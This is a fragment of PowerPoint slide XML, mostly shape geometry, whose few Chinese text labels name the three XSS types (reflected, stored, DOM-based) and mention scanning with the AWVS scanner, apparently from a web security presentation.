                  <a:pt x="587" y="127"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="600" y="111"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="611" y="94"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="619" y="84"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="620" y="83"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="620" y="82"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="620" y="80"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="44" y="76"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="44" y="76"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="34" y="57"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="24" y="36"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="26" y="35"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="24" y="33"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="24" y="31"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="24" y="27"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="24" y="24"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="33" y="42"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="41" y="60"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="51" y="76"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="60" y="94"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="63" y="98"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="63" y="100"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="63" y="101"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="59" y="105"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="58" y="97"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="53" y="90"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="44" y="76"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="602" y="102"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="602" y="102"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="582" y="133"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="552" y="178"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="552" y="173"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="552" y="168"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="556" y="167"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="558" y="166"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="558" y="164"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="553" y="164"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="553" y="163"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="572" y="137"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="585" y="119"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="597" y="101"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="607" y="89"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="616" y="76"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="616" y="80"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="616" y="83"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="613" y="87"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="611" y="93"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="602" y="102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lstStyle/>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1890">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23" name="Freeform 104"/>
          <p:cNvSpPr>
            <a:spLocks noEditPoints="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="765917" y="4500899"/>
            <a:ext cx="2743676" cy="953871"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 618 w 620"/>
              <a:gd name="T1" fmla="*/ 72 h 185"/>
              <a:gd name="T2" fmla="*/ 587 w 620"/>
              <a:gd name="T3" fmla="*/ 35 h 185"/>
              <a:gd name="T4" fmla="*/ 565 w 620"/>
              <a:gd name="T5" fmla="*/ 18 h 185"/>
              <a:gd name="T6" fmla="*/ 598 w 620"/>
              <a:gd name="T7" fmla="*/ 95 h 185"/>
              <a:gd name="T8" fmla="*/ 560 w 620"/>
              <a:gd name="T9" fmla="*/ 152 h 185"/>
              <a:gd name="T10" fmla="*/ 492 w 620"/>
              <a:gd name="T11" fmla="*/ 168 h 185"/>
              <a:gd name="T12" fmla="*/ 338 w 620"/>
              <a:gd name="T13" fmla="*/ 168 h 185"/>
              <a:gd name="T14" fmla="*/ 144 w 620"/>
              <a:gd name="T15" fmla="*/ 164 h 185"/>
              <a:gd name="T16" fmla="*/ 37 w 620"/>
              <a:gd name="T17" fmla="*/ 170 h 185"/>
              <a:gd name="T18" fmla="*/ 279 w 620"/>
              <a:gd name="T19" fmla="*/ 168 h 185"/>
              <a:gd name="T20" fmla="*/ 413 w 620"/>
              <a:gd name="T21" fmla="*/ 171 h 185"/>
              <a:gd name="T22" fmla="*/ 516 w 620"/>
              <a:gd name="T23" fmla="*/ 171 h 185"/>
              <a:gd name="T24" fmla="*/ 543 w 620"/>
              <a:gd name="T25" fmla="*/ 170 h 185"/>
              <a:gd name="T26" fmla="*/ 549 w 620"/>
              <a:gd name="T27" fmla="*/ 170 h 185"/>
              <a:gd name="T28" fmla="*/ 408 w 620"/>
              <a:gd name="T29" fmla="*/ 178 h 185"/>
              <a:gd name="T30" fmla="*/ 267 w 620"/>
              <a:gd name="T31" fmla="*/ 182 h 185"/>
              <a:gd name="T32" fmla="*/ 132 w 620"/>
              <a:gd name="T33" fmla="*/ 179 h 185"/>
              <a:gd name="T34" fmla="*/ 13 w 620"/>
              <a:gd name="T35" fmla="*/ 181 h 185"/>
              <a:gd name="T36" fmla="*/ 2 w 620"/>
              <a:gd name="T37" fmla="*/ 177 h 185"/>
              <a:gd name="T38" fmla="*/ 9 w 620"/>
              <a:gd name="T39" fmla="*/ 159 h 185"/>
              <a:gd name="T40" fmla="*/ 66 w 620"/>
              <a:gd name="T41" fmla="*/ 102 h 185"/>
              <a:gd name="T42" fmla="*/ 48 w 620"/>
              <a:gd name="T43" fmla="*/ 60 h 185"/>
              <a:gd name="T44" fmla="*/ 56 w 620"/>
              <a:gd name="T45" fmla="*/ 17 h 185"/>
              <a:gd name="T46" fmla="*/ 194 w 620"/>
              <a:gd name="T47" fmla="*/ 14 h 185"/>
              <a:gd name="T48" fmla="*/ 282 w 620"/>
              <a:gd name="T49" fmla="*/ 7 h 185"/>
              <a:gd name="T50" fmla="*/ 429 w 620"/>
              <a:gd name="T51" fmla="*/ 9 h 185"/>
              <a:gd name="T52" fmla="*/ 536 w 620"/>
              <a:gd name="T53" fmla="*/ 3 h 185"/>
              <a:gd name="T54" fmla="*/ 494 w 620"/>
              <a:gd name="T55" fmla="*/ 2 h 185"/>
              <a:gd name="T56" fmla="*/ 330 w 620"/>
              <a:gd name="T57" fmla="*/ 5 h 185"/>
              <a:gd name="T58" fmla="*/ 217 w 620"/>
              <a:gd name="T59" fmla="*/ 9 h 185"/>
              <a:gd name="T60" fmla="*/ 78 w 620"/>
              <a:gd name="T61" fmla="*/ 10 h 185"/>
              <a:gd name="T62" fmla="*/ 26 w 620"/>
              <a:gd name="T63" fmla="*/ 21 h 185"/>
              <a:gd name="T64" fmla="*/ 23 w 620"/>
              <a:gd name="T65" fmla="*/ 20 h 185"/>
              <a:gd name="T66" fmla="*/ 19 w 620"/>
              <a:gd name="T67" fmla="*/ 32 h 185"/>
              <a:gd name="T68" fmla="*/ 27 w 620"/>
              <a:gd name="T69" fmla="*/ 51 h 185"/>
              <a:gd name="T70" fmla="*/ 56 w 620"/>
              <a:gd name="T71" fmla="*/ 100 h 185"/>
              <a:gd name="T72" fmla="*/ 11 w 620"/>
              <a:gd name="T73" fmla="*/ 153 h 185"/>
              <a:gd name="T74" fmla="*/ 0 w 620"/>
              <a:gd name="T75" fmla="*/ 173 h 185"/>
              <a:gd name="T76" fmla="*/ 0 w 620"/>
              <a:gd name="T77" fmla="*/ 185 h 185"/>
              <a:gd name="T78" fmla="*/ 7 w 620"/>
              <a:gd name="T79" fmla="*/ 182 h 185"/>
              <a:gd name="T80" fmla="*/ 97 w 620"/>
              <a:gd name="T81" fmla="*/ 181 h 185"/>
              <a:gd name="T82" fmla="*/ 231 w 620"/>
              <a:gd name="T83" fmla="*/ 185 h 185"/>
              <a:gd name="T84" fmla="*/ 370 w 620"/>
              <a:gd name="T85" fmla="*/ 184 h 185"/>
              <a:gd name="T86" fmla="*/ 549 w 620"/>
              <a:gd name="T87" fmla="*/ 181 h 185"/>
              <a:gd name="T88" fmla="*/ 557 w 620"/>
              <a:gd name="T89" fmla="*/ 171 h 185"/>
              <a:gd name="T90" fmla="*/ 611 w 620"/>
              <a:gd name="T91" fmla="*/ 94 h 185"/>
              <a:gd name="T92" fmla="*/ 620 w 620"/>
              <a:gd name="T93" fmla="*/ 82 h 185"/>
              <a:gd name="T94" fmla="*/ 44 w 620"/>
              <a:gd name="T95" fmla="*/ 76 h 185"/>
              <a:gd name="T96" fmla="*/ 26 w 620"/>
              <a:gd name="T97" fmla="*/ 35 h 185"/>
              <a:gd name="T98" fmla="*/ 24 w 620"/>
              <a:gd name="T99" fmla="*/ 24 h 185"/>
              <a:gd name="T100" fmla="*/ 60 w 620"/>
              <a:gd name="T101" fmla="*/ 94 h 185"/>
              <a:gd name="T102" fmla="*/ 59 w 620"/>
              <a:gd name="T103" fmla="*/ 105 h 185"/>
              <a:gd name="T104" fmla="*/ 602 w 620"/>
              <a:gd name="T105" fmla="*/ 102 h 185"/>
              <a:gd name="T106" fmla="*/ 552 w 620"/>
              <a:gd name="T107" fmla="*/ 173 h 185"/>
              <a:gd name="T108" fmla="*/ 558 w 620"/>
              <a:gd name="T109" fmla="*/ 164 h 185"/>
              <a:gd name="T110" fmla="*/ 553 w 620"/>
              <a:gd name="T111" fmla="*/ 163 h 185"/>
              <a:gd name="T112" fmla="*/ 553 w 620"/>
              <a:gd name="T113" fmla="*/ 163 h 185"/>
              <a:gd name="T114" fmla="*/ 607 w 620"/>
              <a:gd name="T115" fmla="*/ 89 h 185"/>
              <a:gd name="T116" fmla="*/ 616 w 620"/>
              <a:gd name="T117" fmla="*/ 83 h 185"/>
              <a:gd name="T118" fmla="*/ 602 w 620"/>
              <a:gd name="T119" fmla="*/ 102 h 18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620" h="185">
                <a:moveTo>
                  <a:pt x="620" y="80"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="620" y="80"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="619" y="78"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="619" y="75"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="618" y="72"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="602" y="54"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="587" y="35"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="569" y="17"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="552" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="550" y="2"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="565" y="18"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="580" y="35"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="597" y="56"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="615" y="75"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="598" y="95"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="582" y="116"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="574" y="128"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="565" y="141"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="560" y="152"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="550" y="164"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="521" y="167"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="507" y="167"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="492" y="168"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="457" y="167"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="419" y="167"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="356" y="168"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="338" y="168"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="322" y="167"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="304" y="166"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="286" y="164"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="216" y="164"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="144" y="164"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="74" y="166"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4" y="170"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="37" y="170"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="70" y="168"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="103" y="167"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="136" y="167"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="279" y="168"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="313" y="170"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="349" y="173"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="364" y="173"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="381" y="173"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="413" y="171"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="448" y="171"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="485" y="171"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="501" y="171"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="516" y="171"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="546" y="168"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="545" y="168"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="543" y="170"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="546" y="168"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="549" y="168"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="549" y="170"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="549" y="178"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="514" y="177"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="479" y="177"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="408" y="178"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="374" y="181"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="340" y="182"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="302" y="182"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="267" y="182"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="234" y="184"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="202" y="182"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="166" y="179"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="132" y="179"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="95" y="179"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="59" y="179"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="29" y="179"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13" y="181"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7" y="182"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="184"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2" y="181"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2" y="177"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2" y="170"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5" y="167"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7" y="163"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9" y="159"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15" y="152"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="34" y="133"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="49" y="117"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="66" y="102"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="67" y="101"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="67" y="100"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="59" y="79"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="48" y="60"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="37" y="42"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="27" y="21"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="56" y="17"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="70" y="16"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="85" y="16"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="161" y="16"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="194" y="14"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="227" y="13"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="243" y="10"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="261" y="7"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="282" y="7"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="301" y="9"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="334" y="9"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="366" y="9"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="429" y="9"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="461" y="7"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="491" y="6"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="521" y="5"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="536" y="3"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="550" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="521" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="494" y="2"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="462" y="3"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="432" y="5"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="363" y="5"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="330" y="5"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="296" y="3"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="265" y="3"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="235" y="7"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="217" y="9"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="199" y="10"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="163" y="10"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="93" y="10"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="78" y="10"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="62" y="11"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="30" y="17"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="27" y="18"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="26" y="21"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="24" y="22"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="24" y="18"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="23" y="20"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="22" y="21"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="20" y="29"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19" y="31"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19" y="32"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19" y="33"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="27" y="51"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="37" y="69"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="45" y="84"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="52" y="94"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="56" y="100"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="59" y="105"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="42" y="120"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="26" y="137"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11" y="153"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7" y="159"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2" y="166"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="168"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="173"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="178"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="182"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="184"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="185"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7" y="182"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13" y="182"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="27" y="182"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="63" y="181"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="97" y="181"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="130" y="181"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="163" y="182"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="195" y="184"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="231" y="185"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="265" y="185"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="298" y="185"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="333" y="185"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="370" y="184"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="407" y="181"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="443" y="179"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="479" y="179"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="514" y="179"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="549" y="181"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="550" y="181"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="557" y="171"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="563" y="163"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="587" y="127"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="600" y="111"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="611" y="94"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="619" y="84"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="620" y="83"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="620" y="82"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="620" y="80"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="44" y="76"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="44" y="76"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="34" y="57"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="24" y="36"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="26" y="35"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="24" y="33"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="24" y="31"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="24" y="27"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="24" y="24"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="33" y="42"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="41" y="60"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="51" y="76"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="60" y="94"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="63" y="98"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="63" y="100"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="63" y="101"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="59" y="105"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="58" y="97"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="53" y="90"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="44" y="76"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="602" y="102"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="602" y="102"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="582" y="133"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="552" y="178"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="552" y="173"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="552" y="168"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="556" y="167"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="558" y="166"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="558" y="164"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="553" y="164"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="553" y="163"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="572" y="137"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="585" y="119"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="597" y="101"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="607" y="89"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="616" y="76"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="616" y="80"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="616" y="83"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="613" y="87"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="611" y="93"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="602" y="102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lstStyle/>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1890">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill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1343660" y="2078990"/>
            <a:ext cx="1379220" cy="3816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9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反射型XSS    </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp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1386840" y="3345180"/>
            <a:ext cx="1387475" cy="3816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9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存储型XSS    </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="31" name="矩形 30"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1324555" y="4786896"/>
            <a:ext cx="1512570" cy="3816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9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DOM型XSS</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="32" name="TextBox 13"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3986530" y="1797685"/>
            <a:ext cx="4131310" cy="939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</a:p>
          <a:p>
            <a:pPr algn="ctr" defTabSz="1216660">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"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可用安全</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1325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en-US" altLang="zh-CN"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WVS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"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扫描</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr" defTabSz="1216660">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"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但不是所有反射型</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"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XSS</a:t>
            </a:r>
            <a:r>
